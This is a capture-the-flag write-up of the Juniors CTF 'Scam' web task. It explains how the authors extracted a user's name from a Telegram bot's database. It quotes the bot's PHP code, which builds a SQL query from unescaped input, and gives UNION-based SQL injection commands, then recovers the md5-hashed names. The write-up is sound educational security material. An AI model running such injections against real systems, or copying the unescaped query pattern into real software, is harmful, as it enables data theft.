---
title: "[Juniors CTF] Scam"
date: 2017-12-03T19:31:50+02:00
subtitle: "Writeup by ipu"
tags: ["Juniors CTF", "ipu", "web", "sql injection"]
---

### The Task

- Grandpa! I paid one hacker 5 thousand rubles and he cheated on me! I asked him
  to hack the e-diary and make my marks better. He did nothing and disappeared!
- Don’t worry, I have fellows, who will help us to find him. Tell me where did
  you find him.
- I found a [telegram bot][1], there was an anonymous chat for hackers with
  disappearing messages mode on. The only thing I can tell — his id in this chat
  is 13. :c

I need his name and surname. 

We opened the link to the telegram bot and got this message:

![Welcome message]()

In addition to the command listed in the welcome message there was an `/about`
command which gave us a link to the source code, but the [gist][2] only had a few
lines

![About command output]()

From the source code they gave us we can understand very little but we decided
to try to get the name using SQL Injection. After no success the CTF team sent
a hint, the full source code! The user input wasn't escaped so we simply needed
to find a query that we can modify to return that data we need from the table
users.

The command `/plus_karma` looked like a simple option, it got one input and
returned one output from the database. Here is the part that we used for the
SQL injection:

```
$resultStr = str_replace("/plus_karma ", "", $text);

...

$search_karma = $mysqli->query("SELECT karma FROM `users` WHERE `id`=".$resultStr." LIMIT 1");
$row = $search_karma->fetch_row();
		
...
		
$message = 'Вы успешно добавили +1 к карме id'.$resultStr.'
Его карма: '.$row[0].'';
sendMessage($chat_id, $message);
```

The code only take the first column from the first row so we need to override
the first SELECT statement. We used a UNION for this, the final commands were:

```
/plus_karma -1 UNION SELECT first_name FROM users WHERE id=13
/plus_karma -1 UNION SELECT last_name FROM users WHERE id=13
```

They gave us the name of the user in md5 and we needed to decrypt it:

```
61409aa1fd47d4a5332de23cbf59a36f -> John
3dba15fad60b23675fe9b01b716413f2 -> Cottrell
```

The flag for this task was `John Cottrell`

[1]: http://t.me/anon_hackers_bot
[2]: https://gist.github.com/testpnz/aaaab66f09c6f9efb54f05b642d92597

